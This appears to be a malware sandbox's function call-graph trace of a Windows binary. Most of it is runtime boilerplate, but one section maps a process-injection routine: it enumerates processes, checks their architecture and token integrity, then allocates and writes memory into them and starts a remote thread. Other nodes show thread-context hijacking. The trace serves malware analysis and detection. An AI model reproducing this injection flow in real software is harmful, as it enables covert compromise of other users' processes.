19090->19092 19093 1c0401cbd52 19092->19093 19104 1c0401cedc8 GetEnvironmentStringsW 19093->19104 19096 1c0401cbd5f 19098 1c0401cd2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 19096->19098 19097 1c0401cbd6b 19124 1c0401cbda8 19097->19124 19098->19091 19101 1c0401cd2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 19102 1c0401cbd92 19101->19102 19103 1c0401cd2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 19102->19103 19103->19091 19105 1c0401cedf8 19104->19105 19106 1c0401cbd57 19104->19106 19107 1c0401cece8 WideCharToMultiByte 19105->19107 19106->19096 19106->19097 19108 1c0401cee49 19107->19108 19109 1c0401cee53 FreeEnvironmentStringsW 19108->19109 19110 1c0401cc5d0 14 API calls 19108->19110 19109->19106 19111 1c0401cee63 19110->19111 19112 1c0401cee6b 19111->19112 19113 1c0401cee74 19111->19113 19114 1c0401cd2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 19112->19114 19115 1c0401cece8 WideCharToMultiByte 19113->19115 19116 1c0401cee72 19114->19116 19117 1c0401cee97 19115->19117 19116->19109 19118 1c0401cee9b 19117->19118 19119 1c0401ceea5 19117->19119 19120 1c0401cd2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 19118->19120 19121 1c0401cd2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 19119->19121 19122 1c0401ceea3 FreeEnvironmentStringsW 19120->19122 19121->19122 19122->19106 19125 1c0401cbdcd 19124->19125 19126 1c0401cd220 _invalid_parameter_noinfo 13 API calls 19125->19126 19137 1c0401cbe03 19126->19137 19127 1c0401cbe0b 19128 1c0401cd2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 19127->19128 19130 1c0401cbd73 19128->19130 19129 1c0401cbe6d 19131 1c0401cd2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 19129->19131 19130->19101 19131->19130 19132 1c0401cd220 _invalid_parameter_noinfo 13 API calls 19132->19137 19133 1c0401cbe92 19143 1c0401cbebc 19133->19143 19135 1c0401cc328 __std_exception_copy 38 API calls 19135->19137 19137->19127 19137->19129 19137->19132 19137->19133 19137->19135 19139 1c0401cbea6 19137->19139 19140 1c0401cd2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 19137->19140 19138 1c0401cd2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 19138->19127 19141 1c0401cd06c _invalid_parameter_noinfo 17 API calls 19139->19141 19140->19137 19142 1c0401cbeb9 19141->19142 19144 1c0401cbe9a 19143->19144 19145 1c0401cbec1 19143->19145 19144->19138 19146 1c0401cbeea 19145->19146 19147 1c0401cd2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 19145->19147 19148 1c0401cd2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 19146->19148 19147->19145 19148->19144 18721 1c0401c6430 18722 1c0401c643d 18721->18722 18723 1c0401c6449 18722->18723 18731 1c0401c655a 18722->18731 18724 1c0401c64cd 18723->18724 18725 1c0401c64a6 SetThreadContext 18723->18725 18725->18724 18726 1c0401c663e 18728 1c0401c665e 18726->18728 18730 1c0401c4b20 VirtualFree 18726->18730 18727 1c0401c6581 VirtualProtect FlushInstructionCache 18727->18731 18729 1c0401c5530 3 API calls 18728->18729 18734 1c0401c6663 18729->18734 18730->18728 18731->18726 18731->18727 18732 1c0401c66b7 18735 1c0401c8070 _invalid_parameter_noinfo 8 API calls 18732->18735 18733 1c0401c6677 ResumeThread 18733->18734 18734->18732 18734->18733 18736 1c0401c66ff 18735->18736 18737 1c0401cec30 GetCommandLineA GetCommandLineW 18754 1c0401cc828 18755 1c0401cc82d 18754->18755 18759 1c0401cc842 18754->18759 18760 1c0401cc848 18755->18760 18761 1c0401cc88a 18760->18761 18762 1c0401cc892 18760->18762 18763 1c0401cd2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 18761->18763 18764 1c0401cd2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 18762->18764 18763->18762 18765 1c0401cc89f 18764->18765 18766 1c0401cd2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 18765->18766 18767 1c0401cc8ac 18766->18767 18768 1c0401cd2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 18767->18768 18769 1c0401cc8b9 18768->18769 18770 1c0401cd2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 18769->18770 18771 1c0401cc8c6 18770->18771 18772 1c0401cd2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 18771->18772 18773 1c0401cc8d3 18772->18773 18774 1c0401cd2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 18773->18774 18775 1c0401cc8e0 18774->18775 18776 1c0401cd2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 18775->18776 18777 1c0401cc8ed 18776->18777 18778 1c0401cd2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 18777->18778 18779 1c0401cc8fd 18778->18779 18780 1c0401cd2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 18779->18780 18781 1c0401cc90d 18780->18781 18786 1c0401cc6f8 18781->18786 18800 1c0401cc558 EnterCriticalSection 18786->18800 18103 1c0401c4320 18104 1c0401c426d 18103->18104 18105 1c0401c42bd VirtualQuery 18104->18105 18106 1c0401c42d7 18104->18106 18107 1c0401c4322 GetLastError 18104->18107 18105->18104 18105->18106 18107->18104 18107->18106 16879 1c0401cfe20 16880 1c0401cfe4a 16879->16880 16881 1c0401cd220 _invalid_parameter_noinfo 13 API calls 16880->16881 16882 1c0401cfe6a 16881->16882 16883 1c0401cd2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 16882->16883 16884 1c0401cfe78 16883->16884 16886 1c0401cd220 _invalid_parameter_noinfo 13 API calls 16884->16886 16890 1c0401cfea2 16884->16890 16885 1c0401cfec1 InitializeCriticalSectionEx 16885->16890 16887 1c0401cfe94 16886->16887 16889 1c0401cd2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 16887->16889 16888 1c0401cfeab 16889->16890 16890->16885 16890->16888 18850 1c0401cf820 18853 1c0401cf7d8 18850->18853 18858 1c0401cc558 EnterCriticalSection 18853->18858 16891 1c0401d465f 16892 1c0401d46e2 16891->16892 16893 1c0401d4677 16891->16893 16893->16892 16899 1c0401c9324 16893->16899 16895 1c0401d46c4 16896 1c0401c9324 __CxxCallCatchBlock 9 API calls 16895->16896 16897 1c0401d46d9 16896->16897 16902 1c0401cc2f4 16897->16902 16900 1c0401c9340 __CxxCallCatchBlock 9 API calls 16899->16900 16901 1c0401c932d 16900->16901 16901->16895 16903 1c0401ccab0 _invalid_parameter_noinfo 14 API calls 16902->16903 16904 1c0401cc2fd 16903->16904 18859 1c0401d485e 18860 1c0401c9324 __CxxCallCatchBlock 9 API calls 18859->18860 18862 1c0401d486c 18860->18862 18861 1c0401d4877 18862->18861 18863 1c0401c9324 __CxxCallCatchBlock 9 API calls 18862->18863 18863->18861 16905 1c0401cd658 16906 1c0401cd67d 16905->16906 16911 1c0401cd694 16905->16911 16907 1c0401cd1f4 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 16906->16907 16909 1c0401cd682 16907->16909 16908 1c0401cd724 16913 1c0401cbb54 13 API calls 16908->16913 16910 1c0401cd04c _invalid_parameter_noinfo 38 API calls 16909->16910 16912 1c0401cd68d 16910->16912 16911->16908 16920 1c0401cd7b6 16911->16920 16922 1c0401cd6da 16911->16922 16938 1c0401cd894 16911->16938 17000 1c0401cda18 16911->17000 16914 1c0401cd77c 16913->16914 16916 1c0401cd784 16914->16916 16926 1c0401cd7d7 16914->16926 16919 1c0401cd2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 16916->16919 16918 1c0401cd836 16921 1c0401cd2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 16918->16921 16923 1c0401cd78b 16919->16923 16925 1c0401cd6fd 16920->16925 16929 1c0401cd2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 16920->16929 16924 1c0401cd841 16921->16924 16922->16925 16930 1c0401cd2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 16922->16930 16923->16925 16931 1c0401cd2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 16923->16931 16928 1c0401cd85a 16924->16928 16932 1c0401cd2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 16924->16932 16927 1c0401cd2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 16925->16927 16926->16918 16926->16926 16935 1c0401cd87c 16926->16935 17037 1c0401d0eb8 16926->17037 16927->16912 16933 1c0401cd2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 16928->16933 16929->16920 16930->16922 16931->16923 16932->16924 16933->16912 16936 1c0401cd06c _invalid_parameter_noinfo 17 API calls 16935->16936 16937 1c0401cd891 16936->16937 16939 1c0401cd8c2 16938->16939 16939->16939 16940 1c0401cd8de 16939->16940 16941 1c0401cd220 _invalid_parameter_noinfo 13 API calls 16939->16941 16940->16911 16942 1c0401cd90d 16941->16942 16943 1c0401cd926 16942->16943 16945 1c0401d0eb8 38 API calls 16942->16945 16944 1c0401d0eb8 38 API calls 16943->16944 16947 1c0401cd9fc 16943->16947 16946 1c0401cd943 16944->16946 16945->16943 16946->16947 16948 1c0401cd97f 16946->16948 16950 1c0401cd98d 16946->16950 16951 1c0401cd962 16946->16951 16949 1c0401cd06c _invalid_parameter_noinfo 17 API calls 16947->16949 16953 1c0401cd2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 16948->16953 16960 1c0401cda17 16949->16960 16954 1c0401cd977 16950->16954 17046 1c0401ceee0 16950->17046 16952 1c0401cd220 _invalid_parameter_noinfo 13 API calls 16951->16952 16956 1c0401cd96d 16952->16956 16953->16947 16954->16948 16955 1c0401cd2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 16954->16955 16955->16948 16959 1c0401cd2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 16956->16959 16957 1c0401cda7a 16962 1c0401cda8c 16957->16962 16969 1c0401cdaa1 16957->16969 16959->16954 16960->16957 17055 1c0401d13d8 16960->17055 16961 1c0401cd9b5 16964 1c0401cd9ba 16961->16964 16965 1c0401cd9d0 16961->16965 16967 1c0401cd894 52 API calls 16962->16967 16966 1c0401cd2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 16964->16966 16968 1c0401cd2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 16965->16968 16966->16954 16995 1c0401cda9c 16967->16995 16968->16948 16971 1c0401cdd78 14 API calls 16969->16971 16970 1c0401c8070 _invalid_parameter_noinfo 8 API calls 16972 1c0401cdd64 16970->16972 16973 1c0401cdb0b 16971->16973 16972->16911 16974 1c0401cdb1a 16973->16974 16975 1c0401cf198 9 API calls 16973->16975 17064 1c0401cd30c 16974->17064 16975->16974 16978 1c0401cdba8 16979 1c0401cd894 52 API calls 16978->16979 16981 1c0401cdbb8 16979->16981 16980 1c0401cdd78 14 API calls 16984 1c0401cdbd2 16980->16984 16982 1c0401cd2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 16981->16982 16981->16995 16982->16995 16983 1c0401cf198 9 API calls 16983->16984 16984->16980 16984->16983 16986 1c0401cd894 52 API calls 16984->16986 16987 1c0401cdcc8 FindNextFileW 16984->16987 16989 1c0401cdd2a 16984->16989 16992 1c0401cd2a0 13 API calls Concurrency::details::SchedulerProxy::DeleteThis 16984->16992 17086 1c0401cd4ac 16984->17086 16986->16984 16987->16984 16988 1c0401cdce0 16987->16988 16990 1c0401cdd0c FindClose 16988->16990 17108 1c0401d0b20 16988->17108 16991 1c0401cdd38 FindClose 16989->16991 16996 1c0401cd2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 16989->16996 16994 1c0401cdd1c 16990->16994 16990->16995 16991->16995 16997 1c0401cdd48 16991->16997 16992->16984 16998 1c0401cd2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 16994->16998 16995->16970 16996->16991 16999 1c0401cd2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 16997->16999 16998->16995 16999->16995 17001 1c0401cda58 17000->17001 17002 1c0401cda7a 17000->17002 17001->17002 17004 1c0401d13d8 38 API calls 17001->17004 17003 1c0401cda8c 17002->17003 17006 1c0401cdaa1 17002->17006 17005 1c0401cd894 56 API calls 17003->17005 17004->17001 17019 1c0401cda9c 17005->17019 17008 1c0401cdd78 14 API calls 17006->17008 17007 1c0401c8070 _invalid_parameter_noinfo 8 API calls 17009 1c0401cdd64 17007->17009 17010 1c0401cdb0b 17008->17010 17009->16911 17011 1c0401cf198 9 API calls 17010->17011 17013 1c0401cdb1a 17010->17013 17011->17013 17012 1c0401cd30c 16 API calls 17014 1c0401cdb7b FindFirstFileExW 17012->17014 17013->17012 17015 1c0401cdba8 17014->17015 17025 1c0401cdbd2 17014->17025 17016 1c0401cd894 56 API calls 17015->17016 17018 1c0401cdbb8 17016->17018 17017 1c0401cdd78 14 API calls 17017->17025 17018->17019 17020 1c0401cd2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 17018->17020 17019->17007 17020->17019 17021 1c0401cf198 9 API calls 17021->17025 17022 1c0401cd4ac 16 API calls 17022->17025 17023 1c0401cd894 56 API calls 17023->17025 17024 1c0401cdcc8 FindNextFileW 17024->17025 17026 1c0401cdce0 17024->17026 17025->17017 17025->17021 17025->17022 17025->17023 17025->17024 17027 1c0401cdd2a 17025->17027 17030 1c0401cd2a0 13 API calls Concurrency::details::SchedulerProxy::DeleteThis 17025->17030 17028 1c0401cdd0c FindClose 17026->17028 17031 1c0401d0b20 38 API calls 17026->17031 17029 1c0401cdd38 FindClose 17027->17029 17033 1c0401cd2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 17027->17033 17028->17019 17032 1c0401cdd1c 17028->17032 17029->17019 17034 1c0401cdd48 17029->17034 17030->17025 17031->17028 17035 1c0401cd2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 17032->17035 17033->17029 17036 1c0401cd2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 17034->17036 17035->17019 17036->17019 17042 1c0401d0ed5 17037->17042 17038 1c0401d0eda 17039 1c0401d0ef0 17038->17039 17040 1c0401cd1f4 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 17038->17040 17039->16926 17041 1c0401d0ee4 17040->17041 17043 1c0401cd04c _invalid_parameter_noinfo 38 API calls 17041->17043 17042->17038 17042->17039 17044 1c0401d0f24 17042->17044 17043->17039 17044->17039 17045 1c0401cd1f4 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 17044->17045 17045->17041 17047 1c0401cef1f 17046->17047 17048 1c0401cef02 17046->17048 17050 1c0401cef29 17047->17050 17116 1c0401d19f0 17047->17116 17048->17047 17049 1c0401cef10 17048->17049 17051 1c0401cd1f4 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 17049->17051 17123 1c0401d1a40 17050->17123 17054 1c0401cef15 17051->17054 17054->16961 17056 1c0401d13e0 17055->17056 17057 1c0401d13f5 17056->17057 17058 1c0401d140e 17056->17058 17059 1c0401cd1f4 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 17057->17059 17061 1c0401cdd78 14 API calls 17058->17061 17063 1c0401d1405 17058->17063 17060 1c0401d13fa 17059->17060 17062 1c0401cd04c _invalid_parameter_noinfo 38 API calls 17060->17062 17061->17063 17062->17063 17063->16960 17065 1c0401cd35a 17064->17065 17066 1c0401cd336 17064->17066 17067 1c0401cd3bf 17065->17067 17068 1c0401cd35f 17065->17068 17069 1c0401cd2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 17066->17069 17073 1c0401cd345 FindFirstFileExW 17066->17073 17070 1c0401cec58 MultiByteToWideChar 17067->17070 17071 1c0401cd374 17068->17071 17068->17073 17074 1c0401cd2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 17068->17074 17069->17073 17080 1c0401cd3db 17070->17080 17075 1c0401cc5d0 14 API calls 17071->17075 17072 1c0401cd3e2 GetLastError 17076 1c0401cd184 13 API calls 17072->17076 17073->16978 17073->16984 17074->17071 17075->17073 17079 1c0401cd3ef 17076->17079 17077 1c0401cd420 17077->17073 17078 1c0401cec58 MultiByteToWideChar 17077->17078 17082 1c0401cd47a 17078->17082 17083 1c0401cd1f4 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 17079->17083 17080->17072 17080->17077 17081 1c0401cd413 17080->17081 17084 1c0401cd2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 17080->17084 17085 1c0401cc5d0 14 API calls 17081->17085 17082->17072 17082->17073 17083->17073 17084->17081 17085->17077 17087 1c0401cd4fa 17086->17087 17088 1c0401cd4d6 17086->17088 17089 1c0401cd55f 17087->17089 17090 1c0401cd500 17087->17090 17091 1c0401cd2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 17088->17091 17093 1c0401cd4e5 17088->17093 17092 1c0401cece8 WideCharToMultiByte 17089->17092 17090->17093 17094 1c0401cd515 17090->17094 17097 1c0401cd2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 17090->17097 17091->17093 17101 1c0401cd583 17092->17101 17093->16984 17095 1c0401cc5d0 14 API calls 17094->17095 17095->17093 17096 1c0401cd58a GetLastError 17098 1c0401cd184 13 API calls 17096->17098 17097->17094 17100 1c0401cd597 17098->17100 17099 1c0401cece8 WideCharToMultiByte 17103 1c0401cd629 17099->17103 17104 1c0401cd1f4 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 17100->17104 17101->17096 17105 1c0401cd2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 17101->17105 17106 1c0401cd5bb 17101->17106 17107 1c0401cd5c7 17101->17107 17102 1c0401cc5d0 14 API calls 17102->17107 17103->17093 17103->17096 17104->17093 17105->17106 17106->17102 17107->17093 17107->17099 17109 1c0401d0b52 17108->17109 17110 1c0401cd1f4 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 17109->17110 17115 1c0401d0b67 17109->17115 17111 1c0401d0b5c 17110->17111 17112 1c0401cd04c _invalid_parameter_noinfo 38 API calls 17111->17112 17112->17115 17113 1c0401c8070 _invalid_parameter_noinfo 8 API calls 17114 1c0401d0ea8 17113->17114 17114->16990 17115->17113 17117 1c0401d19f9 17116->17117 17118 1c0401d1a12 HeapSize 17116->17118 17119 1c0401cd1f4 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 17117->17119 17120 1c0401d19fe 17119->17120 17121 1c0401cd04c _invalid_parameter_noinfo 38 API calls 17120->17121 17122 1c0401d1a09 17121->17122 17122->17050 17124 1c0401d1a5f 17123->17124 17125 1c0401d1a55 17123->17125 17127 1c0401d1a64 17124->17127 17133 1c0401d1a6b _invalid_parameter_noinfo 17124->17133 17126 1c0401cc5d0 14 API calls 17125->17126 17131 1c0401d1a5d 17126->17131 17128 1c0401cd2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 17127->17128 17128->17131 17129 1c0401d1a9e HeapReAlloc 17129->17131 17129->17133 17130 1c0401d1a71 17132 1c0401cd1f4 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 17130->17132 17131->17054 17132->17131 17133->17129 17133->17130 17134 1c0401cb470 _invalid_parameter_noinfo 2 API calls 17133->17134 17134->17133 15505 140003668 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 15506 1400036be K32EnumProcesses 15505->15506 15507 14000371b SleepEx 15506->15507 15508 1400036d3 15506->15508 15507->15506 15508->15507 15510 1400031c4 15508->15510 15511 1400031d5 15510->15511 15512 1400031fd 15510->15512 15516 140001868 OpenProcess 15511->15516 15512->15508 15515 140001868 31 API calls 15515->15512 15517 140001cd1 15516->15517 15518 1400018b0 IsWow64Process 15516->15518 15517->15515 15519 1400018c7 CloseHandle 15518->15519 15519->15517 15521 1400018ed 15519->15521 15521->15517 15522 14000192f OpenProcess 15521->15522 15522->15517 15523 14000194b OpenProcess 15522->15523 15524 140001a04 NtQueryInformationProcess 15523->15524 15525 14000196a K32GetModuleFileNameExW 15523->15525 15526 140001cc8 CloseHandle 15524->15526 15527 140001a29 15524->15527 15528 1400019b3 CloseHandle 15525->15528 15529 140001983 PathFindFileNameW lstrlenW 15525->15529 15526->15517 15527->15526 15530 140001a33 OpenProcessToken 15527->15530 15528->15524 15532 1400019c1 15528->15532 15529->15528 15531 1400019a0 StrCpyW 15529->15531 15530->15526 15533 140001a51 GetTokenInformation 15530->15533 15531->15528 15532->15524 15534 1400019e0 StrCmpIW 15532->15534 15535 140001af4 15533->15535 15536 140001a79 GetLastError 15533->15536 15534->15526 15534->15532 15538 140001afb CloseHandle 15535->15538 15536->15535 15537 140001a84 LocalAlloc 15536->15537 15537->15535 15539 140001a9a GetTokenInformation 15537->15539 15538->15526 15543 140001b0f 15538->15543 15540 140001ae2 15539->15540 15541 140001ac2 GetSidSubAuthorityCount GetSidSubAuthority 15539->15541 15542 140001ae9 LocalFree 15540->15542 15541->15542 15542->15538 15543->15526 15544 140001b9f StrStrA 15543->15544 15545 140001bc8 15543->15545 15544->15543 15546 140001bcd 15544->15546 15545->15526 15546->15526 15547 140001bf8 VirtualAllocEx 15546->15547 15547->15526 15548 140001c27 WriteProcessMemory 15547->15548 15548->15526 15549 140001c46 15548->15549 15557 140002bfc 15549->15557 15551 140001c66 15551->15526 15552 140001c74 WaitForSingleObject 15551->15552 15553 140001c83 GetExitCodeThread 15552->15553 15554 140001cbd CloseHandle 15552->15554 15555 140001ca2 VirtualFreeEx 15553->15555 15556 140001c99 15553->15556 15554->15526 15555->15554 15556->15555 15560 1400020cc GetModuleHandleA 15557->15560 15561 1400020f5 15560->15561 15562 1400020ec GetProcAddress 15560->15562 15562->15561 17135 1c0401c2e54 17137 1c0401c2ea8 17135->17137 17136 1c0401c2ec3 17137->17136 17139 1c0401c37f4 17137->17139 17140 1c0401c388a 17139->17140 17143 1c0401c3819 17139->17143 17140->17136 17141 1c0401c3f88 StrCmpNIW 17141->17143 17142 1c0401c1e08 StrCmpIW StrCmpW 17142->17143 17143->17140 17143->17141 17143->17142 17153 1c0401c824c 17154 1c0401c8270 __scrt_release_startup_lock 17153->17154 17155 1c0401cb581 17154->17155 17156 1c0401ccb10 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 17154->17156 17157 1c0401cb5aa 17156->17157 19223 1c0401d494f 19224 1c0401d495e 19223->19224 19225 1c0401d4968 19223->19225 19227 1c0401cc5ac LeaveCriticalSection 19224->19227 19228 1c0401cad48 19229 1c0401c9324 __CxxCallCatchBlock 9 API calls 19228->19229 19230 1c0401cad7d 19229->19230 19231 1c0401c9324 __CxxCallCatchBlock 9 API calls 19230->19231 19232 1c0401cad8b __except_validate_context_record 19231->19232 19233 1c0401c9324 __CxxCallCatchBlock 9 API calls 19232->19233 19234 1c0401cadcf 19233->19234 19235 1c0401c9324 __CxxCallCatchBlock 9 API calls 19234->19235 19236 1c0401cadd8 19235->19236 19237 1c0401c9324 __CxxCallCatchBlock 9 API calls 19236->19237 19238 1c0401cade1 19237->19238 19251 1c0401c993c 19238->19251 19241 1c0401c9324 __CxxCallCatchBlock 9 API calls 19242 1c0401cae11 __CxxCallCatchBlock 19241->19242 19243 1c0401c9978 __CxxCallCatchBlock 9 API calls 19242->19243 19248 1c0401caec2 19243->19248 19244 1c0401caeeb __CxxCallCatchBlock 19245 1c0401c9324 __CxxCallCatchBlock 9 API calls 19244->19245 19246 1c0401caefe 19245->19246 19247 1c0401c9324 __CxxCallCatchBlock 9 API calls 19246->19247 19250 1c0401caf07 19247->19250 19248->19244 19249 1c0401c8ff8 __CxxCallCatchBlock 9 API calls 19248->19249 19249->19244 19252 1c0401c9324 __CxxCallCatchBlock 9 API calls 19251->19252 19253 1c0401c994d 19252->19253 19254 1c0401c9958 19253->19254 19255 1c0401c9324 __CxxCallCatchBlock 9 API calls 19253->19255 19256 1c0401c9324 __CxxCallCatchBlock 9 API calls 19254->19256 19255->19254 19257 1c0401c9969 19256->19257 19257->19241 19257->19242 18890 1c0401d4848 18893 1c0401c904c 18890->18893 18894 1c0401c9064 18893->18894 18895 1c0401c9076 18893->18895 18894->18895 18896 1c0401c906c 18894->18896 18897 1c0401c9324 __CxxCallCatchBlock 9 API calls 18895->18897 18898 1c0401c9074 18896->18898 18900 1c0401c9324 __CxxCallCatchBlock 9 API calls 18896->18900 18899 1c0401c907b 18897->18899 18899->18898 18901 1c0401c9324 __CxxCallCatchBlock 9 API calls 18899->18901 18902 1c0401c909b 18900->18902 18901->18898 18903 1c0401c9324 __CxxCallCatchBlock 9 API calls 18902->18903 18904 1c0401c90a8 18903->18904 18905 1c0401cc2f4 14 API calls 18904->18905 18906 1c0401c90b1 18905->18906 18907 1c0401cc2f4 14 API calls 18906->18907 18908 1c0401c90bd 18907->18908 17163 1c0401fae42 17176 1c0401f9324 17163->17176 17165 1c0401fae93 RaiseException 17167 1c0401faeba 17165->17167 17166 1c0401fae4f __CxxCallCatchBlock 17166->17165 17179 1c0401f9978 17167->17179 17169 1c0401f9324 __CxxCallCatchBlock 9 API calls 17170 1c0401faefe 17169->17170 17172 1c0401f9324 __CxxCallCatchBlock 9 API calls 17170->17172 17174 1c0401faf07 17172->17174 17175 1c0401faeeb __CxxCallCatchBlock 17175->17169 17177 1c0401f9340 __CxxCallCatchBlock 9 API calls 17176->17177 17178 1c0401f932d 17177->17178 17178->17166 17180 1c0401f9324 __CxxCallCatchBlock 9 API calls 17179->17180 17181 1c0401f998a 17180->17181 17182 1c0401f99c5 17181->17182 17183 1c0401f9324 __CxxCallCatchBlock 9 API calls 17181->17183 17184 1c0401f9995 17183->17184 17184->17182 17185 1c0401f9324 __CxxCallCatchBlock 9 API calls 17184->17185 17186 1c0401f99b6 17185->17186 17186->17175 17187 1c0401f8ff8 17186->17187 17188 1c0401f9324 __CxxCallCatchBlock 9 API calls 17187->17188 17189 1c0401f9006 17188->17189 17189->17175 18114 1c0401cff40 18115 1c0401cff4b 18114->18115 18123 1c0401d2c24 18115->18123 18136 1c0401cc558 EnterCriticalSection 18123->18136 18920 1c0401cf440 GetProcessHeap 17190 1c0401cae42 17191 1c0401c9324 __CxxCallCatchBlock 9 API calls 17190->17191 17193 1c0401cae4f __CxxCallCatchBlock 17191->17193 17192 1c0401cae93 RaiseException 17194 1c0401caeba 17192->17194 17193->17192 17203 1c0401c9978 17194->17203 17196 1c0401caeeb __CxxCallCatchBlock 17197 1c0401c9324 __CxxCallCatchBlock 9 API calls 17196->17197 17198 1c0401caefe 17197->17198 17199 1c0401c9324 __CxxCallCatchBlock 9 API calls 17198->17199 17202 1c0401caf07 17199->17202 17204 1c0401c9324 __CxxCallCatchBlock 9 API calls 17203->17204 17206 1c0401c998a 17204->17206 17205 1c0401c99c5 17206->17205 17207 1c0401c9324 __CxxCallCatchBlock 9 API calls 17206->17207 17208 1c0401c9995 17207->17208 17208->17205 17209 1c0401c9324 __CxxCallCatchBlock 9 API calls 17208->17209 17210 1c0401c99b6 17209->17210 17210->17196 17211 1c0401c8ff8 17210->17211 17212 1c0401c9324 __CxxCallCatchBlock 9 API calls 17211->17212 17213 1c0401c9006 17212->17213 17213->17196 18922 1c0401d387c 18923 1c0401d38b4 __GSHandlerCheckCommon 18922->18923 18924 1c0401d38e0 18923->18924 18926 1c0401c9a24 18923->18926 18927 1c0401c9324 __CxxCallCatchBlock 9 API calls 18926->18927 18928 1c0401c9a4e 18927->18928 18929 1c0401c9324 __CxxCallCatchBlock 9 API calls 18928->18929 18930 1c0401c9a5b 18929->18930 18931 1c0401c9324 __CxxCallCatchBlock 9 API calls 18930->18931 18932 1c0401c9a64 18931->18932 18932->18924 19288 1c0401c5974 19289 1c0401c597a 19288->19289 19300 1c0401c7fa0 19289->19300 19293 1c0401c59de 19295 1c0401c5a77 19295->19293 19297 1c0401c5bfd 19295->19297 19313 1c0401c7b80 19295->19313 19296 1c0401c5cfb 19297->19296 19298 1c0401c5d77 VirtualProtect 19297->19298 19298->19293 19299 1c0401c5da3 GetLastError 19298->19299 19299->19293 19301 1c0401c7fab 19300->19301 19302 1c0401c59bd 19301->19302 19303 1c0401cb470 _invalid_parameter_noinfo 2 API calls 19301->19303 19304 1c0401c7fca 19301->19304 19302->19293 19309 1c0401c4400 19302->19309 19303->19301 19305 1c0401c7fd5 19304->19305 19319 1c0401c87b8 19304->19319 19323 1c0401c87d8 19305->19323 19310 1c0401c441d 19309->19310 19312 1c0401c448c 19310->19312 19327 1c0401c4670 19310->19327 19312->19295 19314 1c0401c7bc7 19313->19314 19352 1c0401c7950 19314->19352 19317 1c0401c8070 _invalid_parameter_noinfo 8 API calls 19318 1c0401c7bf1 19317->19318 19318->19295 19320 1c0401c87c6 std::bad_alloc::bad_alloc 19319->19320 19321 1c0401c9178 Concurrency::cancel_current_task 2 API calls 19320->19321 19322 1c0401c87d7 19321->19322 19324 1c0401c87e6 std::bad_alloc::bad_alloc 19323->19324 19325 1c0401c9178 Concurrency::cancel_current_task 2 API calls 19324->19325 19326 1c0401c7fdb 19325->19326 19328 1c0401c46b7 19327->19328 19329 1c0401c4694 19327->19329 19330 1c0401c46ed 19328->19330 19347 1c0401c4250 19328->19347 19329->19328 19341 1c0401c4120 19329->19341 19331 1c0401c471d 19330->19331 19335 1c0401c4250 2 API calls 19330->19335 19333 1c0401c4753 19331->19333 19336 1c0401c4120 3 API calls 19331->19336 19337 1c0401c4120 3 API calls 19333->19337 19339 1c0401c476f 19333->19339 19335->19331 